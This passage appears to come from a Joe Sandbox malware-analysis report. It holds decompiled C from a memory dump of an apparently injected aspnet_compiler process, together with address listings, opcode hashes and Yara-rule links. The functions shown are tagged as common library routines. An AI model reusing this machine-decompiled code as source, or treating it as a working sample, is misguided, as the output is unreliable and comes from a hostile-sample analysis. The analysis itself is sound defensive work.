						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                        0x011bb94c
                                                                                        0x011bb956
                                                                                        0x011bb95c
                                                                                        0x011bb95e
                                                                                        0x011bb964
                                                                                        0x011bb969
                                                                                        0x011bb96d
                                                                                        0x011bb96d
                                                                                        0x011bb970
                                                                                        0x011bb974
                                                                                        0x011bb97a
                                                                                        0x011bbadf
                                                                                        0x011bbadf
                                                                                        0x011bbae2
                                                                                        0x011bbae4
                                                                                        0x011bbae6
                                                                                        0x011bbaf0
                                                                                        0x01202cb8
                                                                                        0x011bbaf6
                                                                                        0x011bbaf6
                                                                                        0x011bbaf6
                                                                                        0x011bbafd
                                                                                        0x011bbb1f
                                                                                        0x011bbb1f
                                                                                        0x011bbaff
                                                                                        0x011bbb00
                                                                                        0x011bbb00
                                                                                        0x011bbb03
                                                                                        0x011bbb03
                                                                                        0x011bbacb
                                                                                        0x011bbacf
                                                                                        0x011bbad0
                                                                                        0x011bbad1
                                                                                        0x011bbadc
                                                                                        0x011bbadc
                                                                                        0x011bb980
                                                                                        0x011bb980
                                                                                        0x011bb988
                                                                                        0x011bb98b
                                                                                        0x011bb98d
                                                                                        0x011bb990
                                                                                        0x011bb993
                                                                                        0x011bb999
                                                                                        0x011bb99b
                                                                                        0x011bb9a1
                                                                                        0x011bb9a5
                                                                                        0x011bb9aa
                                                                                        0x011bb9b0
                                                                                        0x011bb9bb
                                                                                        0x011bb9c0
                                                                                        0x011bb9c3
                                                                                        0x011bb9ca
                                                                                        0x011bb9cc
                                                                                        0x011bb9cf
                                                                                        0x011bb9d3
                                                                                        0x011bb9d7
                                                                                        0x011bba94
                                                                                        0x011bba94
                                                                                        0x011bba98
                                                                                        0x011bbaa3
                                                                                        0x01202ccb
                                                                                        0x011bbaa9
                                                                                        0x011bbaa9
                                                                                        0x011bbaa9
                                                                                        0x011bbab1
                                                                                        0x01202cd5
                                                                                        0x01202cdd
                                                                                        0x01202cdd
                                                                                        0x011bbabb
                                                                                        0x011bbabc
                                                                                        0x011bbac2
                                                                                        0x011bbac3
                                                                                        0x011bbac3
                                                                                        0x011bbac6
                                                                                        0x00000000
                                                                                        0x011bb9dd
                                                                                        0x011bb9dd
                                                                                        0x011bb9e7
                                                                                        0x011bb9e7
                                                                                        0x011bb9ec
                                                                                        0x011bb9ec
                                                                                        0x011bb9f1
                                                                                        0x011bb9f5
                                                                                        0x011bb9fa
                                                                                        0x011bba00
                                                                                        0x011bba0c
                                                                                        0x011bba10
                                                                                        0x011bba10
                                                                                        0x011bba12
                                                                                        0x011bba18
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bbb26
                                                                                        0x011bbb26
                                                                                        0x011bba1e
                                                                                        0x011bba1e
                                                                                        0x011bba23
                                                                                        0x011bba25
                                                                                        0x011bba2c
                                                                                        0x011bba30
                                                                                        0x011bba35
                                                                                        0x011bba35
                                                                                        0x011bba41
                                                                                        0x011bba46
                                                                                        0x011bba4c
                                                                                        0x011bba50
                                                                                        0x011bba54
                                                                                        0x011bba6a
                                                                                        0x011bba6e
                                                                                        0x011bba70
                                                                                        0x011bba74
                                                                                        0x011bba78
                                                                                        0x011bba7a
                                                                                        0x011bba7c
                                                                                        0x011bba8e
                                                                                        0x011bba90
                                                                                        0x011bba92
                                                                                        0x011bbb14
                                                                                        0x011bbb14
                                                                                        0x011bbb16
                                                                                        0x011bbb16
                                                                                        0x00000000
                                                                                        0x011bba7c
                                                                                        0x011bbb0a
                                                                                        0x011bbb0d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bbb0f

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011BB9A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 885266447-0
                                                                                        • Opcode ID: df3402673cee75dff195d91426b18eee11a834025c581f972b15d4d63449bdf1
                                                                                        • Instruction ID: 6297916d20333da64f810e4cfb25f16c8aa375949a7efcb457f2dfd34ebb4f95
                                                                                        • Opcode Fuzzy Hash: df3402673cee75dff195d91426b18eee11a834025c581f972b15d4d63449bdf1
                                                                                        • Instruction Fuzzy Hash: E9517971A08301CFC729CF29C4C092ABBF5FB88604F55896EFA8587795E770E844CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E0119B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x126f7a8);
				E011ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E011ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E011DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E011DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E011EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E011DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E011DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E011DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E011DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                        0x0119b171
                                                                                        0x0119b171
                                                                                        0x0119b171
                                                                                        0x0119b171
                                                                                        0x0119b171
                                                                                        0x0119b176
                                                                                        0x0119b17b
                                                                                        0x0119b180
                                                                                        0x0119b186
                                                                                        0x0119b18f
                                                                                        0x0119b198
                                                                                        0x0119b1a4
                                                                                        0x0119b1aa
                                                                                        0x011f4802
                                                                                        0x011f4802
                                                                                        0x011f4805
                                                                                        0x011f480c
                                                                                        0x011f480e
                                                                                        0x0119b1d1
                                                                                        0x0119b1d3
                                                                                        0x0119b1de
                                                                                        0x0119b1de
                                                                                        0x011f4817
                                                                                        0x011f481e
                                                                                        0x011f4820
                                                                                        0x011f4822
                                                                                        0x011f4822
                                                                                        0x011f4824
                                                                                        0x011f4824
                                                                                        0x011f482a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f4835
                                                                                        0x011f483a
                                                                                        0x011f483d
                                                                                        0x011f483f
                                                                                        0x011f4842
                                                                                        0x011f4842
                                                                                        0x011f4842
                                                                                        0x011f4846
                                                                                        0x011f484c
                                                                                        0x011f484e
                                                                                        0x011f4851
                                                                                        0x011f4851
                                                                                        0x011f4853
                                                                                        0x011f4854
                                                                                        0x011f4854
                                                                                        0x011f4858
                                                                                        0x011f485a
                                                                                        0x011f485a
                                                                                        0x011f485d
                                                                                        0x011f485f
                                                                                        0x011f4861
                                                                                        0x011f4861
                                                                                        0x011f4866
                                                                                        0x011f486b
                                                                                        0x011f486e
                                                                                        0x011f4871
                                                                                        0x011f4876
                                                                                        0x011f4876
                                                                                        0x011f4878
                                                                                        0x011f487b
                                                                                        0x011f4884
                                                                                        0x011f4884
                                                                                        0x00000000
                                                                                        0x011f487d
                                                                                        0x011f487d
                                                                                        0x011f4882
                                                                                        0x011f4889
                                                                                        0x011f4889
                                                                                        0x011f488f
                                                                                        0x011f4891
                                                                                        0x011f48e0
                                                                                        0x011f48e2
                                                                                        0x011f48e4
                                                                                        0x011f48e4
                                                                                        0x011f48e7
                                                                                        0x011f48e7
                                                                                        0x011f48ed
                                                                                        0x011f48f4
                                                                                        0x011f48f6
                                                                                        0x011f4951
                                                                                        0x011f4951
                                                                                        0x011f4953
                                                                                        0x011f4953
                                                                                        0x011f4956
                                                                                        0x011f4956
                                                                                        0x011f4958
                                                                                        0x011f4959
                                                                                        0x011f4959
                                                                                        0x011f495d
                                                                                        0x011f495d
                                                                                        0x011f495f
                                                                                        0x011f495f
                                                                                        0x011f4965
                                                                                        0x011f4969
                                                                                        0x011f49ba
                                                                                        0x011f49ba
                                                                                        0x011f49c1
                                                                                        0x011f49c5
                                                                                        0x011f49cc
                                                                                        0x011f49d4
                                                                                        0x011f49d7
                                                                                        0x011f49da
                                                                                        0x011f49e4
                                                                                        0x011f49e5
                                                                                        0x011f49f3
                                                                                        0x011f4a02
                                                                                        0x00000000
                                                                                        0x011f4a02
                                                                                        0x011f4972
                                                                                        0x011f4974
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f4976
                                                                                        0x011f4979
                                                                                        0x011f4982
                                                                                        0x011f4983
                                                                                        0x011f4984
                                                                                        0x011f498b
                                                                                        0x011f498d
                                                                                        0x011f4991
                                                                                        0x011f4993
                                                                                        0x011f4999
                                                                                        0x011f499d
                                                                                        0x011f49a2
                                                                                        0x011f49a2
                                                                                        0x011f49a2
                                                                                        0x011f4999
                                                                                        0x011f49ac
                                                                                        0x00000000
                                                                                        0x011f49b3
                                                                                        0x011f48f8
                                                                                        0x011f48fe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f48fe
                                                                                        0x011f4895
                                                                                        0x011f489c
                                                                                        0x011f48ad
                                                                                        0x011f48b2
                                                                                        0x011f48b5
                                                                                        0x011f48b7
                                                                                        0x011f48ba
                                                                                        0x011f48bc
                                                                                        0x011f48c6
                                                                                        0x011f48c6
                                                                                        0x011f48cb
                                                                                        0x011f48d1
                                                                                        0x011f48d4
                                                                                        0x011f48d8
                                                                                        0x011f48d8
                                                                                        0x00000000
                                                                                        0x011f48d8
                                                                                        0x011f48be
                                                                                        0x011f48c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f48c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f48c4
                                                                                        0x00000000
                                                                                        0x011f4882
                                                                                        0x011f487b
                                                                                        0x011f4904
                                                                                        0x011f4906
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f4908
                                                                                        0x011f490e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f4910
                                                                                        0x011f4917
                                                                                        0x011f4917
                                                                                        0x00000000
                                                                                        0x011f4917
                                                                                        0x0119b1ba
                                                                                        0x011f47f9
                                                                                        0x011f47fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f47fc
                                                                                        0x0119b1c0
                                                                                        0x0119b1c0
                                                                                        0x0119b1c3
                                                                                        0x0119b1cb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: _vswprintf_s
                                                                                        • String ID:
                                                                                        • API String ID: 677850445-0
                                                                                        • Opcode ID: 026dea0e52bed5a8b043a6ba7bd5d82f1b3b29e06331687f60ad907716dad2bb
                                                                                        • Instruction ID: 28e70773d8d6578fbaf213ea2c051ff0ce5ae5dc4fae67aca5fb168329052ff3
                                                                                        • Opcode Fuzzy Hash: 026dea0e52bed5a8b043a6ba7bd5d82f1b3b29e06331687f60ad907716dad2bb
                                                                                        • Instruction Fuzzy Hash: 7351F371E002598EEF39CFA8C844BAEBBF0BF44714F1141ADDA59AB682D7304981CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D4A2C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 58%
                                                                                        			E011D4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x128d360 ^ _t62;
				_v8 =  *0x128d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E011B2280(_t26, 0x1288608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E011AFFB0(_t41, _t51, 0x1288608);
						L2:
						 *0x128b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E011DB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E011B2280(_t28, 0x1288608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E011AFFB0(_t42, _t53, 0x1288608);
							if(_t53 != 0) {
								L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E011AFFB0(_t41, _t51, 0x1288608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                        0x011d4a2c
                                                                                        0x011d4a34
                                                                                        0x011d4a3c
                                                                                        0x011d4a3e
                                                                                        0x011d4a48
                                                                                        0x011d4a4b
                                                                                        0x011d4a4d
                                                                                        0x011d4a51
                                                                                        0x011d4a9c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d4aa3
                                                                                        0x011d4aa8
                                                                                        0x011d4aad
                                                                                        0x011d4ab1
                                                                                        0x011d4ade
                                                                                        0x011d4ae3
                                                                                        0x011d4a5a
                                                                                        0x011d4a62
                                                                                        0x011d4a6a
                                                                                        0x011d4a6e
                                                                                        0x0120f203
                                                                                        0x011d4a84
                                                                                        0x011d4a88
                                                                                        0x011d4a89
                                                                                        0x011d4a8a
                                                                                        0x011d4a95
                                                                                        0x011d4a95
                                                                                        0x011d4a79
                                                                                        0x011d4a80
                                                                                        0x011d4af2
                                                                                        0x011d4af4
                                                                                        0x011d4af9
                                                                                        0x011d4aff
                                                                                        0x011d4b01
                                                                                        0x011d4b03
                                                                                        0x011d4b08
                                                                                        0x0120f20a
                                                                                        0x0120f212
                                                                                        0x0120f216
                                                                                        0x0120f216
                                                                                        0x011d4b08
                                                                                        0x011d4b13
                                                                                        0x011d4b1a
                                                                                        0x0120f229
                                                                                        0x0120f229
                                                                                        0x011d4b1a
                                                                                        0x011d4a82
                                                                                        0x00000000
                                                                                        0x011d4a82
                                                                                        0x011d4ab7
                                                                                        0x011d4acd
                                                                                        0x011d4acd
                                                                                        0x011d4ad5
                                                                                        0x011d4ada
                                                                                        0x00000000
                                                                                        0x011d4ada
                                                                                        0x011d4ac2
                                                                                        0x011d4acb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d4acb
                                                                                        0x011d4a53
                                                                                        0x011d4a53
                                                                                        0x011d4a58
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: d7d1c2b2b95ac3ad9f327e66bc05271e06c1f160d74e81ecffd9535d8922465c
                                                                                        • Instruction ID: 830c4d28596aed7f6615d5c9fee1c61fd0940fe3d61b546bb47df96b79320b59
                                                                                        • Opcode Fuzzy Hash: d7d1c2b2b95ac3ad9f327e66bc05271e06c1f160d74e81ecffd9535d8922465c
                                                                                        • Instruction Fuzzy Hash: 1A3134322163519FD73AAF18C984B2ABBE4FF81704F41452DE4524BE81C774E800CB87
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011B0050 Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E011B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x128d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E011C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E011DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01268A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E011C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x128b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                        0x011b0055
                                                                                        0x011b005d
                                                                                        0x011b0062
                                                                                        0x011b006c
                                                                                        0x011b006f
                                                                                        0x011b0074
                                                                                        0x011b007a
                                                                                        0x011b007a
                                                                                        0x011b0080
                                                                                        0x011b0080
                                                                                        0x011b0087
                                                                                        0x011b008d
                                                                                        0x011b008f
                                                                                        0x011b0093
                                                                                        0x011b0095
                                                                                        0x011b009b
                                                                                        0x011b00f8
                                                                                        0x011b00fb
                                                                                        0x011b00fc
                                                                                        0x011b00ff
                                                                                        0x011b0108
                                                                                        0x011b0108
                                                                                        0x011b00a2
                                                                                        0x011b00a6
                                                                                        0x011b00b3
                                                                                        0x011b00bc
                                                                                        0x011b00c5
                                                                                        0x011b00ca
                                                                                        0x011fc01e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011fc02d
                                                                                        0x011b00d5
                                                                                        0x011b00d9
                                                                                        0x011fc03d
                                                                                        0x011fc046
                                                                                        0x011fc046
                                                                                        0x011b00df
                                                                                        0x011b00e2
                                                                                        0x011b00ea
                                                                                        0x011b00ef
                                                                                        0x011b00f2
                                                                                        0x011b00f6
                                                                                        0x011b0111
                                                                                        0x011b0117
                                                                                        0x011b0117
                                                                                        0x00000000
                                                                                        0x011b00f6
                                                                                        0x011b00d0
                                                                                        0x011b00d0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: 0ae3eb9fd3419e36b13cb1183df387a593c9be0bf28d4ae3853f179e40148098
                                                                                        • Instruction ID: 1243eddfd72f70cd2795bd481d8bad8fbd0bf00c5903cc15891c004794091489
                                                                                        • Opcode Fuzzy Hash: 0ae3eb9fd3419e36b13cb1183df387a593c9be0bf28d4ae3853f179e40148098
                                                                                        • Instruction Fuzzy Hash: 0B318C35201B04CFD72ACF28C884B9BB7F5FF89754F14456DE59687A90EB75A801CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 82%
                                                                                        			E011C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912024) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed char _t245;
				signed int _t246;
				signed char _t247;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				signed int _t281;
				signed int _t283;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
